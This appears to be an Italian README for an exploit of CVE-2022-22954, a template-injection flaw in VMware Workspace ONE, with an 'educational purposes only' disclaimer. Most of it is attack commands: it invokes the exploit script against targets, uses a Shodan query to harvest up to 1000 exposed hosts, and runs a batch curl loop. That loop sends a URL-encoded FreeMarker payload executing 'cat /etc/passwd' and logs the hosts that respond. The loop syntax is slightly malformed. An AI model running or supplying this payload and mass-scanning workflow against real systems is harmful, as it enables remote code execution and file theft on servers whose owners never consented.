
Exploit Python per CVE-2022-22954, una vulnerabilità SSTI di VMware Workspace ONE, con scansione batch e integrazione con Shodan per la scoperta di host vulnerabili.
Usalo a tuo rischio e pericolo. Questo repository è destinato esclusivamente a scopi educativi e siamo fermamente contrari a ogni intenzione illegale; non saremo responsabili di eventuali attività illegali associate a questo repository. Sii etico!
python3 CVE-2022-22954.py -t target.com
python3 CVE-2022-22954.py -t 10.10.10.10
shodan search "http.favicon.hash:-1250474341" --limit 1000
cat list_vm_one.txt | awk '{print $1":"$2}' > vm_one.txt
cat vm_one.txt | while read host do;do curl --max-time 2 --silent --path-as-is --insecure "$host/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" | grep "root:*" && echo "$host [Vulnerable]" >> vuln_vm_one_ssti.txt;done